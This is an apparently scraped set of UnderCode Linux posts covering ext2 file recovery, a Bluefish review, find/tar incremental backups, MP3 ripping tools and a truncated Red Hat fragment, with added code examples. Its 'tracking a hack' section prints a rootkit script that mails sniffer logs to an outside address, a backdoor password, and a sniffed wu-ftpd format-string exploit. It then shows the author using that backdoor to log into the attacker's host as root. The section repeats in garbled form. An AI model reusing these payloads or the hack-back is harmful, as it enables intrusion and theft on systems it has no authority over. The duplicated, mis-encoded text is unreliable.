โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑 Miscellaneous Tools - Recover Deleted Files in the ext2 File System :
twitter.com/UnderCodeNews
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) If you accidentally deleted an important file, for example with rm -rf kkk where kkk is a file you badly need, you must be in a lot of pain. Don't panic, and stop writing anything to your hard disk immediately: the file is completely recoverable. (I wrote the following specifically for the ext2 file system; other file systems have their own methods, which I will write about later.)
# debugfs /dev/hda1     (the partition where the deleted file was located)
debugfs: lsdel
This lists the inodes of your recently deleted files in a table roughly like this:
2) Inode Owner Mode Size Blocks Time deleted
3) The columns are the inode number, the owner, the file mode (read, write permissions and so on), the size, the block count (generally 1 block = 1K) and the time of deletion. With this information you should be able to quickly identify the file you want to recover. Then use
debugfs: dump <the inode number you want to restore> /home/directory     (recovers it to that directory)
OK! It's that simple; you will find it in /home/directory.
4) Of course, if you have many files, doing this one by one is definitely troublesome, so you can download tools for it. Here is one:
http://revocer.sourceforge.net/linux/recover.
Everyone, try it. If you have any difficulties, please post them here.
5) While practising this, my brothers got the following output and did not know how to deal with it. Please enlighten me.
311543 0 100600 7603556 14/14 Wed Oct 2 18:39:21 2002
586046 0 100644 7044 2/2 Wed Oct 2 18:51:50 2002
760593 0 100600 363 1/1 Wed Oct 2 18:53:35 2002
9551 deleted inodes found.
debugfs: dump 311543
dump: Usage: dump_inode [-p] <file> <output_file>
debugfs: dump 311543 /root
311543: File not found by ext2_lookup
debugfs:
6) I want to restore inode 311543, because I deleted a file in the /root directory and saw that it was 311543, but when I used the command above to restore it, the prompt above appeared.
7) You should do it like this:
debugfs: dump <311543> /root/ppp     (any file name)
Try again. Did you succeed?
8) I am under Windows right now, and my Linux uses JFS, where recovery is more convenient. Wait until I switch to Linux and build an ext2 system; I have tried it before, and it must be
9) OK. Dude, you are terrific; I followed it and it worked.
Now my brother has a question: I deleted a .tar.gz file, but after the restoration completed, I cannot extract it with
# tar zxvf *.tar.gz
10) The other question is how to restore the original file name. For example, I deleted wine.tar.gz but cannot remember the exact file name, yet I want to restore it under its original name. Or I deleted important system files whose names I do not remember, but whose names are extremely important to the system, such as mozilla under /usr/bin. How can I do this?
11) The main thing is to know why. The answer is simple. To find the file name, use
debugfs: ls -d
12) As for the file being unusable: dump copies a continuous run of blocks, and your file may not have been stored in continuous blocks.
Use debugfs: stat <inode> to see its status, and then dd the blocks out one by one (of course there are tools that save a lot of effort).
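As an added example that is not part of the original thread, here is a small shell script for the "many files" case of step 4 done without a separate download: it turns the lsdel table into a batch of dump commands. The lsdel sample, the /recover directory, the inode-NNN output names and the 1000-byte size filter are all constructed for the example. The inode syntax follows steps 5 to 7 above: dump 311543 /root fails because the inode number lacks angle brackets, while dump <311543> /root/ppp succeeds because it has them and names an output file.

```shell
#!/bin/sh
# Added example, not from the original post: turn the table printed by `debugfs: lsdel`
# into a batch of `dump <inode> <out_file>` commands, so many deleted inodes can be
# recovered in one pass instead of one by one (step 4 of the post).
# Assumptions: the lsdel column layout shown in the post, the constructed sample below,
# and a hypothetical recovery directory /recover that lives on a DIFFERENT file system
# (writing recovered data onto the damaged partition can overwrite the very blocks you need).

# Constructed sample of lsdel output, modelled on the table quoted in the thread.
LSDEL_SAMPLE='debugfs: lsdel
 Inode  Owner  Mode    Size      Blocks   Time deleted
311543      0 100600 7603556   14/  14 Wed Oct  2 18:39:21 2002
586046      0 100644    7044    2/   2 Wed Oct  2 18:51:50 2002
760593      0 100600     363    1/   1 Wed Oct  2 18:53:35 2002
3 deleted inodes found.'

# lsdel_dump_cmds MIN_SIZE OUTDIR
# Reads lsdel output on stdin and prints one "dump" command per inode whose size is at
# least MIN_SIZE bytes. Every command targets its own output FILE named after the inode,
# with the inode number in angle brackets as debugfs requires.
lsdel_dump_cmds() {
    awk -v min="$1" -v dir="$2" '
        # Data rows start with a numeric inode; the prompt, header and summary lines do not.
        $1 ~ /^[0-9]+$/ && NF >= 5 {
            if ($4 + 0 >= min) {
                printf "dump <%s> %s/inode-%s\n", $1, dir, $1
            }
        }'
}

# lsdel_count: number of deleted-inode rows in the table (compare with the summary line).
lsdel_count() {
    awk '$1 ~ /^[0-9]+$/ && NF >= 5 { n++ } END { print n + 0 }'
}

# Generate the commands; to run them, save the output to a file and feed it to debugfs:
#   printf '%s\n' "$LSDEL_SAMPLE" | lsdel_dump_cmds 1000 /recover > cmds.txt
#   debugfs -f cmds.txt /dev/hda1
printf '%s\n' "$LSDEL_SAMPLE" | lsdel_dump_cmds 1000 /recover
```

The size filter is there because lsdel on a long-lived partition lists thousands of inodes (9551 in step 5), most of them tiny temporary files; recovering only the ones above a threshold keeps the batch manageable.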
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑 Bluefish web editor based on Linux text mode:
fb.com/UnderCodeTesting
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) Bluefish advertises itself as "an editor for skilled web designers and programmers", but its UI is very intuitive: any beginner can quickly get started, then discover and gradually master its other features. If you need a text editor for writing web code, it is a very good piece of software. The overall impression it gives me is professional but not intimidating, and the combination of text and icons is good.
2) Bluefish provides options for many common HTML tasks, such as fonts, tables and of course links. The software uses the less common term "anchor" for clickable links. The link dialog box even offers JavaScript event handlers such as OnClick and OnMouseover.
3) It also has dialogs for PHP and SQL tasks, as well as many options for Apache and C, and you can group files by project for development. The search-and-replace function is also very good: it supports regular expressions, and you can customize syntax highlighting for multiple languages.
4) Now some of its shortcomings. If you need documentation, you have to open a separate document, because help is not integrated into the application. The documentation is very extensive, and if you are patient you can certainly find what you want. For example, I could not find spell checking quickly, but after reading the documentation I found that you must install the standalone open-source Aspell program to be able to spell-check.
5) Macros are handled through a "custom menu", where you can create your own text strings, HTML opening and closing tags, or search-and-replace commands. Creating text strings involves some dialog boxes with extra features, which are very simple to use.
6) Somewhat disappointingly, in such an intuitive interface I could not find how to edit a custom-menu macro I had created, but if you follow the steps in the documentation everything becomes clear. Macros may not be as powerful as in some other applications; for example, I could not find how to use other Bluefish commands from the custom menu, but they are very convenient for repetitive input.
7) Finally, Bluefish does not position itself as an application for writing prose, and it lacks some text-manipulation commands, such as changing case or merging and splitting lines.
8) That said, if you are looking for a moderately featured text-based web code editor, Bluefish is definitely worth a try.
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑 Make Incremental Backups on Linux :
T.me/underCodeTesting
1) The first step in creating an incremental backup is to generate a list of the files that have changed recently. This is usually done with the find command.
2) For example, to generate a list of the files that have changed in the last 24 hours, use:
find / -mtime -1 ! -type d -print > /tmp/filelist.daily
3) Here the -mtime -1 option makes find select files modified within the past 24 hours, and ! -type d removes directory names from the list. To find all files changed in the past week, use:
find / -mtime -7 -print > /tmp/filelist.weekly
4) Once the list of files to back up has been generated, use the tar -T option to name the file that contains the list. For example, to back up all the files listed in /tmp/filelist.daily to the device /dev/fd0, use:
tar -cv -T /tmp/filelist.daily -f /dev/fd0
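The procedure in steps 1 to 4, as an added example that is not part of the original post, wrapped in one shell function and demonstrated on a constructed directory tree. It assumes GNU find and GNU tar (for -print0 and --null), and uses a temporary directory, a one-day window and a .tar file on disk in place of /dev/fd0.

```shell
#!/bin/sh
# Added example, not from the original post: the find + tar -T procedure above as one
# function, so the list and the archive are produced together and kept side by side.
# Assumptions: GNU find (-print0) and GNU tar (--null); the directory, day count and
# archive path are the caller's choice.

# incremental_backup ROOT DAYS ARCHIVE LISTFILE
# Writes every non-directory under ROOT modified in the last DAYS*24 hours to LISTFILE
# and archives exactly those paths into ARCHIVE. Names are NUL-separated so that a file
# name containing a newline cannot split into two list entries or smuggle in a path that
# was never selected.
incremental_backup() {
    root=$1 days=$2 archive=$3 listfile=$4
    # -mtime -N: modified less than N*24h ago; ! -type d: leave out directories themselves.
    find "$root" -mtime "-$days" ! -type d -print0 > "$listfile" || return 1
    # --null tells tar that -T's list is NUL-separated.
    tar --null -cf "$archive" -T "$listfile"
}

# archive_members ARCHIVE: print the archive contents, one path per line.
archive_members() {
    tar -tf "$1"
}

# Demonstration on a constructed tree: one fresh file and one file back-dated to 2000.
# Only the fresh file should end up in the daily archive.
demo_incremental() {
    work=$(mktemp -d) || return 1
    mkdir -p "$work/src/etc"
    printf 'fresh\n' > "$work/src/etc/new.conf"
    printf 'stale\n' > "$work/src/etc/old.conf"
    touch -t 200001010000 "$work/src/etc/old.conf"
    incremental_backup "$work/src" 1 "$work/daily.tar" "$work/filelist.daily" || return 1
    archive_members "$work/daily.tar"
    rm -rf "$work"
}

demo_incremental
```

Two caveats a practitioner should keep in mind: the list only records files that still exist and were modified inside the window, so deletions are never captured and a periodic full backup is still needed to restore a consistent tree; and mtime is under the control of whoever can write the file (touch resets it), so a find-based list is a convenience for backups, not evidence of what changed on a host you suspect has been tampered with.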
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
🦑 Tracking a hack full tutorial by undercode :
t.me/undercodeTesting
🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :
1) When I checked my machine, I unexpectedly discovered it had been hacked.
It was actually my own mistake: I had not patched wuftpd26, nor changed /etc/ftpusers,
so people could easily use wuftpd26's remote vulnerability to enter my machine as the anonymous user. However, this friend apparently installed his rootkit without much care.
🦑 As a result, the output of ps looked like this:
[root@ns]# ps
  PID TTY STAT  TIME COMMAND
  678   1 S     0:00 /sbin/mingetty tty1
  679   2 S     0:00 /sbin/mingetty tty2
  680   3 S     0:00 /sbin/mingetty tty3
  681   4 S     0:00 /sbin/mingetty tty4
  682   5 S     0:00 /sbin/mingetty tty5
  683   6 S     0:00 /sbin/mingetty tty6
 5557   ? S     0:00 /bin/sh -i
 5591   ? R     0:00 ps
🦑 I think everyone can see what this means. So let's go step by step through what he did.
[This hacker did not expect that the machine already had an owner, and installed his own rootkit toolkit.]
1) [root@ns]# strings /bin/login | more
..........
__bss_start
_end
PPRV
DISPLAY
/bin/envpc
l4m3r0x
/bin/sh
2) From the above it can be seen that this is a login backdoor: after export PATH="l4m3r0x" one can telnet to the machine directly and get a # prompt.
[root@ns]# strings /bin/ls | more
.....
always
/usr/local/share/locale
fileutils
GNU fileutils-3.13
vdir
%s-%s
/dev/sgk/.fsdc/.1file
//DIRED//
//SUBDIRED//
POSIXLY_CORRECT
COLUMNS
3) Note that /dev/sgk/.fsdc/.1file is where his rootkit's files are located, so let's see what's there.
[root@ns]# mv /dev/sgk/.fsdc/.1file /tmp
[root@ns]# ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root      ftp     1024 Feb  4 09:01 .
drwxr-xr-x 3 root      ftp     1024 Feb  2 17:11 ..
-rw-r--r-- 1 root      ftp        7 Feb  2 17:11 .1logz
-rw-r--r-- 1 root      ftp       88 Feb  2 17:11 .1proc
drwxr-xr-x 2 root      ftp     1024 Feb  2 17:11 backup
drwxrwxr-x 2 undercode         1024 Feb  2 17:14 clean
-rwxr-xr-x 1 undercode         5578 Nov 18 11:08 filetrans
-rwxr-xr-x 1 undercode         9396 Aug 23       killall-real
-rwxr-xr-x 1 undercode         7578 Aug 21 17:22 parse
-rwxr-xr-x 1 undercode         6232 Sep  9       parse1
drwxrwxr-x 2 undercode         1024 Jan 28 16:34 patches
-rwxr-xr-x 1 undercode        28004 Aug 23       ps-real
-rwxr-xr-x 1 undercode       580696 Feb 18  2000 ssh
-rw-r--r-- 1 root      ftp     1398 Feb  4 08:55 system
4) Oh, there seem to be quite a lot of things. From ftp we can tell that he used the ftp vulnerability; from lujiang, he also stole a local user.
[root@ns .fsdc]# cat .1logz
rshd
[root@ns .fsdc]# cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root@ns .fsdc]# cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse
5) .1logz is used by the trojaned syslogd, which hides the log records generated by the listed commands.
.1proc is used by the trojaned ps, which hides the listed process names.
.1file is used by the trojaned ls, which hides the listed file names.
[root@ns .fsdc]# cd patches
[root@ns patches]# cat patch.sh
#!/bin/sh
echo "[1] Patching WU-FTPd..."
rpm -Uhv wuftpd.rpm
echo "[2] Patching NFS-utils..."
rpm -Fvh nfs-utils.rpm
ps aux >> /tmp/psaux
if [ "`cat /tmp/psaux | grep rpc.statd`" ]; then
echo "[3] Restarting the rpc.statd daemon (NFS-utils)"
/etc/rc.d/init.d/nfslock restart
else
echo "[4] The daemon rpc.statd isn't running, so no need to restart!"
fi
rm /tmp/psaux
6) This is a patch package for the wuftpd and rpc.statd vulnerabilities.
I did not read the other files and directories carefully [these will be provided in the download package].
Following the hidden-file list .1file, let's find these files one by one.
[root@ns .fsdc]# strings /usr/bin/xtty
......
PPRV
(nfsiod)
socket
bind
listen
accept
/bin/sh
7) It is not difficult to see that this is a backdoor.
[root@ns .fsdc]# strings /dev/pttys
#!/bin/sh
cat /dev/sgk/.fsdc/system | mail prosupp@usa.net > /dev/null 2>&1
nohup /usr/lib/lpset > /dev/null &
nohup /usr/bin/xtty > /dev/null &
rm -rf nohup.out
This hacker is very smart: this script mails the sniffer records to prosupp@usa.net [/dev/sgk/.fsdc/system is the sniffer log].
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit | more
..........
if [ "$PROMPT" != "no" ]; then
    /sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd | more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]='%.100s', error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new %d bit RSA key.
RSA key generation complete.
F:p:b:k:h:g:diqV:
i686-unknown-linux
1.2.27
sshd version %s [%s]
Usage: %s [options]
Options:
/usr/info/.clib stores an ssh backdoor, so that the machine opens a convenient door for the hacker after every startup.
[root@ns .fsdc]# strings /sbin/syslogd
==================================================================
Time: %s Size: %d
Path: %s
=> %s [%d]
------------------------------------------------------------
Exiting...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/dev/null
eth0
system
cant open log
🦑 This hacker turned the syslogd binary into a sniffer.
..........
The next step is to restore the system and change the stolen account passwords; I will not go into that here. From my sniffer records, I know that he came from these two machines.
[root@ns man]# more system2
==================================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
------------------------------------------------------------
## g #> 4h #> 4hUSER ftp
#> hPASS 111F11CA? k ^ 11 ^ Ff \ 1 ^ = 11 ^ C11 ^ u1F ^ = 0F1FvFNV110bin0sh1..11
#> h <#? Hsite exec xx (%. F% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%
.f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f % .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% c% c% c% .f |% p
# @@ h
========================================
🦑 From the above we know that the attack came from 210.217.237.75. Out of habit, the same backdoor is usually installed there too, so
[root@ns man]# export DISPLAY="l4m3r0x"
[root@ns man]# telnet 210.217.237.75
Trying 210.217.237.75...
Connected to 210.217.237.75.
Escape character is '^]'.
> Boramae Cache Server 3.5.1
bash# w
> 7:48pm up 71 days, 9:43, 1 user, load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE    JCPU   PCPU  WHAT
root     tty1     -                 25Nov 0  31days  0.08s  0.05s -bash
undercode testing root
bash# ps -ef
  PID TTY STAT  TIME COMMAND
  940   2 S     0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
  941   3 S     0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
  942   4 S     0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
  943   5 S     0:00 /sbin/mingetty tty5 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
  944   6 S     0:00 /sbin/mingetty tty6 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
  957   1 S     0:00 -bash HOME=/root PATH=/sbin:/bin:/usr/sbin:/usr/bin SHELL=/
22151   ? S     0:00 -bash HOME=/root USER=root LOGNAME=root PATH=/usr/bin:/bin:
22178   ? S     0:00  \_ ../ssh -l pthl mega.ee.tu-berlin.de LESSOPEN=|/usr/bin/
. . . . . . . . . .
[root @ ns .fsdc] # strings / dev / pttys
#! / Bin / sh
cat /dev/sgk/.fsdc/ system | mail prosupp@usa.net > / dev / null 2> & 1
nohup / usr / lib / lpset> / dev / null &
nohup / usr / bin / xtty> / dev / null &
rm -rf nohup.out
this The hack is very smart, and you can send sniffing records to this scriptprosupp@usa.net [/dev/sgk/.fsdc/systemๆฏไธชๅ ๆข่ฎฐๅฝ]
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit|more
..........
if [ \"$PROMPT\" != \"no\" ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd|more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]=\%.100s\, error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new% d bit RSA key.
RSA key generation complete.
F: p: b: k: h: g: diqV:
i686-unknown-linux
1.2.27
sshd version% s [% s]
Usage:% s [options]
Options:
/usr/info/.clib stores an ssh backdoor, so that the machine will open a convenient door for
hacking after startup. [Root @ ns .fsdc] # strings / sbin / syslogd
=========== =======================================================
Time:% s Size:% d
Path:% s
=>% s [% d]
------------------------------ ------------------------------
Exiting ...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/ dev / null
eth0
system
cant open log
๐ฆ This hack changed the syslogd file into a sniffer
. . . . . . . . . .
The next step is to restore the system and modify the stolen account password. This is not a complaint here. From my sniffing records, I know that he came from these two machines.
[Root @ ns man] # more system2
================ =================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
--------------------------- ---------------------------------
## g #> 4h #> 4hUSER ftp
#> hPASS 111F11CA? k ^ 11 ^ Ff \ 1 ^ = 11 ^ C11 ^ u1F ^ = 0F1FvFNV110bin0sh1..11
#> h <#? Hsite exec xx (%. F% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%
.f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f % .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% c% c% c% .f |% p
# @@ h
========================================
๐ฆ From the above we know that the hack was attacked from 210.217.237.75. According to habits, usually the same backdoor is done, so
[root @ ns man] # export DISPLAY = \ "l4m3r0x \"
[root @ ns man] # telnet 210.217.237.75
Trying 210.217.237.75 ...
Connected to 210.217.237.75.
Escape character is \^]\.
> Boramae Cache Server 3.5.1
bash# w
> 7:48pm up 71 days, 9:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 25Nov 0 31days 0.08s 0.05s -bash
undercode testing root
bash# ps -ef
PID TTY STAT TIME COMMAND
940 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
941 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
942 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
943 5 S 0:00 /sbin/mingetty tty5 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
944 6 S 0:00 /sbin/mingetty tty6 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
957 1 S 0:00 -bash HOME=/root PATH=/sbin:/bin:/usr/sbin:/usr/bin SHELL=/
22151 ? S 0:00 -bash HOME=/root USER=root LOGNAME=root PATH=/usr/bin:/bin:
22178 ? S 0:00 \_ ../ssh -l pthl mega.ee.tu-berlin.de LESSOPEN=|/usr/bin/
. . . . . . . . . .
3) Use the rpm command to check whether commonly used commands have been modified.
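Two of the checks above, worked as an added example that is not part of the original article: pulling printable strings out of a suspect binary and matching them against the sniffer tell-tales in the listing, parsing `rpm -Va` output for changed system binaries, and reading `ip -o link` for a NIC left in promiscuous mode. The byte blob and the rpm/ip lines below are constructed samples for offline use.

```python
"""Added example (not from the original article): quick checks for the
situation described above, a system binary such as syslogd replaced by a
sniffer.  The byte blob and the rpm -Va / ip link lines are constructed;
the indicator strings come from the article's listing."""

import re
import string

# Strings a stock syslogd has no reason to contain (seen in the listing above).
SNIFFER_INDICATORS = ("SOCK_PACKET", "promiscuous", "PF_PACKET", "ETH_P_ALL")

# Printable bytes for the strings scan: letters, digits, punctuation, space.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


def extract_strings(blob, min_len=4):
    """Rough equivalent of strings(1): runs of printable bytes >= min_len."""
    found, run = [], bytearray()
    for byte in blob:
        if byte in PRINTABLE:
            run.append(byte)
            continue
        if len(run) >= min_len:
            found.append(run.decode())
        run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode())
    return found


def sniffer_hits(blob):
    """Strings from the binary that match a sniffer indicator."""
    return [s for s in extract_strings(blob)
            if any(ind.lower() in s.lower() for ind in SNIFFER_INDICATORS)]


def modified_binaries(rpm_verify_output):
    """Parse `rpm -Va` lines; return paths whose size (S) or digest (5) no
    longer match the package database.  Config files (attribute 'c') are
    skipped because they legitimately change.  'missing' files are reported
    too: a rootkit may delete tools it wants to hide from."""
    suspicious = []
    for line in rpm_verify_output.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        flags, path = parts[0], parts[-1]
        if flags == "missing":
            suspicious.append(("missing", path))
        elif len(parts) >= 3 and parts[1] == "c":
            continue
        elif "S" in flags or "5" in flags:
            suspicious.append(("modified", path))
    return suspicious


def promiscuous_interfaces(ip_link_output):
    """Interfaces flagged PROMISC in `ip -o link` output; a running sniffer
    usually leaves the NIC that way (the binary above tries to set it)."""
    names = []
    for line in ip_link_output.splitlines():
        m = re.match(r"\d+:\s+(\S+?):\s+<([^>]*)>", line)
        if m and "PROMISC" in m.group(2).split(","):
            names.append(m.group(1))
    return names


# Constructed sample data (not real files from the compromised host).
FAKE_BINARY = (b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
               + b"cant get SOCK_PACKET socket\x00"
               + b"\x90\x90\x01\x02" + b"cant set promiscuous mode\x00"
               + b"Time: %s Size: %d\x00/dev/null\x00eth0\x00")

FAKE_RPM_VA = """\
S.5....T.    /sbin/syslogd
.......T.    /bin/ls
S.5....T.  c /etc/syslog.conf
missing      /usr/bin/lsof
"""

FAKE_IP_LINK = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
"""

if __name__ == "__main__":
    print("sniffer strings:", sniffer_hits(FAKE_BINARY))
    print("rpm -Va suspects:", modified_binaries(FAKE_RPM_VA))
    print("promiscuous NICs:", promiscuous_interfaces(FAKE_IP_LINK))
```

On a live box feed `open("/sbin/syslogd","rb").read()`, the output of `rpm -Va` and of `ip -o link` to the three functions; a clean rpm database is only meaningful if the rpm binary itself has not been replaced, so compare against a known-good copy when in doubt.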
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
UNDERCODE COMMUNITY
๐ฆ TRACKING A HACK FULL BY UNDERCODE
This method is used by GOV
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Beautify and Finish - Make MP3s under Linux by undercode :
twitter.com/UnderCodeNews
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
> Many friends who like music try to turn their CDs into MP3s on the computer. Linux users can do this too; it is not a Windows / Mac privilege. This time I will introduce two Linux programs for making MP3s.
My favourite is Grip, written in GTK+.
1) Grip is not actually an MP3 encoder or a CD ripper. It just provides a simple, easy-to-use graphical interface so that you don't have to use command-line tools to make MP3s.
2) As for CD rippers (programs that grab CD tracks), Grip supports cdparanoia and cdda2wav. For MP3 encoders it supports bladeenc, lame, l3enc, xingmp3enc, mp3encode, gogo and others, which is quite handy. I use cdparanoia and bladeenc.
๐ฆ The following are the URLs of some CD rippers / MP3 encoders:
1) CD ripper
· cdparanoia
http://www.xiph.org/paranoia
· cdda2wav
ftp://ftp.gwdg.de/pub/linux../misc/cdda2wav
2) MP3 encoder
· BladeEnc
http://bladeenc.mp3.no
· LAME
http://www.sulaco.org/mp3
· gogo
http://homepage1.nifty.com/herumi/gogo_e.html
3) Choose one CD ripper and one MP3 encoder; once they are installed you can use Grip. If you use rpm, I suggest cdparanoia / cdda2wav + gogo. Their RPMs can be downloaded from the following URLs:
cdparanoia RPM
http://rpmfind.net/linux/RPM/redhat...9.6-2.i386.html
cdda2wav RPM
http://rpmfind.net/linux/RPM/redhat...1.8-2.i386.html
gogo RPM
http://www.aial.hiroshima-u.ac.jp/~...2.35-1.i386.rpm
4) If you use Debian / Corel / Storm Linux, you can use the Debian packages for cdparanoia / cdda2wav, but because of licensing issues Debian has no MP3 encoder package; you need to install one yourself.
5) After installing the CD ripper and MP3 encoder, you can use Grip to make MP3s. Grip's website is http://www.nostatic.org/grip
You can download its RPM package from "http://www.nostatic.org/grip/grip-2.94-1.i386.rpm"; the Debian package grip can be downloaded and installed with apt-get.
6) Run the command grip and you will see Grip's main window. First we need to set the CD ripper and MP3 encoder to use: click the Config tab, select Rip, and choose the installed CD ripper in the Ripper field. Then select MP3 under Config and choose an installed MP3 encoder in the Encoder field.
7) Now put your favourite audio CD into the CD-ROM drive; the table under Tracks is updated automatically. If you have time, click the "pencil" button below to give the CD and its tracks proper names. In the table, right-click to select a song. After selecting, go to the Rip tab and press Rip+Encode; the selected tracks will be made into MP3s. Grip can also grab part of a track: select Rip partial track, press Play, note the sectors at the start and end of the part, and enter them in Start sector and End sector respectively. When the process completes, the MP3s are in the mp3 directory under your home directory, i.e. ~/mp3/.
๐ฆ KDE department: Krabber
1) Krabber is another front end for CD rippers and MP3 encoders. Krabber is built with Qt and the KDE libraries, so only KDE users can use it; this is its major disadvantage (I don't use KDE, so I had to install it). Krabber supports cdparanoia, 8hz-mp3, lame, encode, bladeenc, l3enc, mp3enc and xingmp3enc, and it can automatically detect whether the required components are installed.
2) It needs mpg123 to play MP3s. Krabber's settings are similar to Grip's: Format selects the installed MP3 encoder, and the first box under Generic Options selects your input device, e.g. /dev/hdc (the CD-ROM drive). One feature Krabber has that Grip lacks is a CPU-usage control, so you can keep working while recording MP3s. Krabber is quite easy to use; just follow its four steps:
choose a song, choose a directory, choose a file name, and execute.
Krabber website: http://krabber.automatix.de
KDE website: http://www.kde.org
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ in RedHat Installation and Startup-Solve SSL Connection Errors in RH Auto Upgrade :
instagram.com/UnderCodeTestingCompany
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) First download the following files into the same directory:
* up2date-3.1.23.2-1.i386.rpm - MD5 checksum: 3faabcb9cc610627fe378b88d0b2b928
https://rhn.redhat.com/download/1070772005/5f2776990f4ab1fadf92d2a388866e7c3c45ba69/1352983/0/rhn/repository/NULL/up2date/3.1.23.3.1.23. .23.2-1.i386.rpm
